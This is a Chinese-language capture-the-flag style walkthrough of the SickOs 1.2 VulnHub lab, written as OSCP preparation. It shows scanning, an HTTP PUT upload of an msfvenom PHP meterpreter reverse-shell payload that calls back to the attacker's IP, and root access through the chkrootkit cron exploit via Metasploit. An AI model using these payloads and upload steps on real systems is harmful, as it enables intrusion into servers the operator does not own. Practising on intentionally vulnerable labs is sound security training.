当前位置: 首页 > news >正文

OSCP备战-SickOs1.2靶场详细步骤

一、靶机介绍

靶机基本信息:

靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/
作者D4rk
发布日期2016年4月27日
难度中等

二、信息搜集

记得将网络连接改成nat模式
1、    目标IP探测
 
目标IP:192.168.155.186
2、    端口扫描

nmap -p- --min-rate 1000 -T4 192.168.155.186


 

   nmap -p22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.186


 
三、GETshell


信息不多一个ssh,一个站点。先去站点看看情况
给出一张图片:病毒真的是杀毒公司为了钱而制作的吗
 
查看源码没有什么东西,目录扫描一遍
dirsearch -u http://192.168.155.186
 

好像没有什么有用信息
 
可以确定入口了,查询一下:

searchsploit lighttp


 
但是没有看到1.4.28版本对应漏洞
查询一下网址请求方法:

curl http://192.168.155.186/test/ -vv -X OPTIONS



看到有PUT方法,结合之前的访问目录,猜测文件上传访问反弹shell
制作php脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.155.166 LPORT=443 >shell4431.php



上传:

curl -v -H "Expect:" -T shell4431.php "http://192.168.155.186/test/"



打开msf:

use exploit/multi/handler
show options
set lhost IP
set lport 443
run


 
成功
 

四、提权


内核提权,查看发行版本:

cat /etc/os-release



 
有脚本但是不行
 
列出与系统定时目录相关的文件和配置

ls -la /etc/cron*



找到一个 chkrootkit
有漏洞利用,一个说明文档一个msf脚本
 
将会话放置后台
 


进入特定会话
 

 set seesion 1


成功
 
完成
 

相关文章:

  • WPF 按钮悬停动画效果实现
  • 大数据如何赋能市场情报分析?——精准决策,从数据开始
  • Bently Nevada 135473-01振动监控模块3500系列状态系统
  • 强化学习极简入门笔记
  • 技术文档撰写指南:从结构到细节的全流程解析
  • 小白玩串口控制的ASCII避坑
  • 计算机网络常见体系结构、分层必要性、分层设计思想以及专用术语介绍
  • MySQL 查询语句的执行顺序
  • 在 WSL Ubuntu-24.04 上安装 Nacos 2.5.1 并使用 MySQL 数据库
  • Knife4j框架的使用
  • HOW - 简历和求职面试宝典(二)
  • 基于MATLAB实现SFA(Slow Feature Analysis,慢特征分析)算法
  • 湖北理元理律师事务所债务优化实践:在还款与生活间寻找平衡支点
  • 网络摄像机POE交换机选型指南:技术参数与场景适配深度解析
  • 多语种OCR识别系统,引领文字识别新时代
  • 深入剖析网络协议:七层协议与四层协议详解
  • 本地socket间通信,可以直接使用read读取socket中的结构体
  • JAVA重症监护系统源码 ICU重症监护系统源码 智慧医院重症监护系统源码
  • SpringBoot 日志
  • Windows 下如何打开设置环境变量的对话框
  • 济南营销型网站/关键词优化平台有哪些
  • 网站开发 石家庄/怎么提交百度收录
  • 上海南建设培训执业中心网站/怎么申请网站
  • 网站的mysql数据库放到服务器上服务器需要安装mysql吗?/百度云搜索引擎
  • 成都哪里做网站/正规接单赚佣金的平台
  • 水土保持生态建设网站/seo点击排名器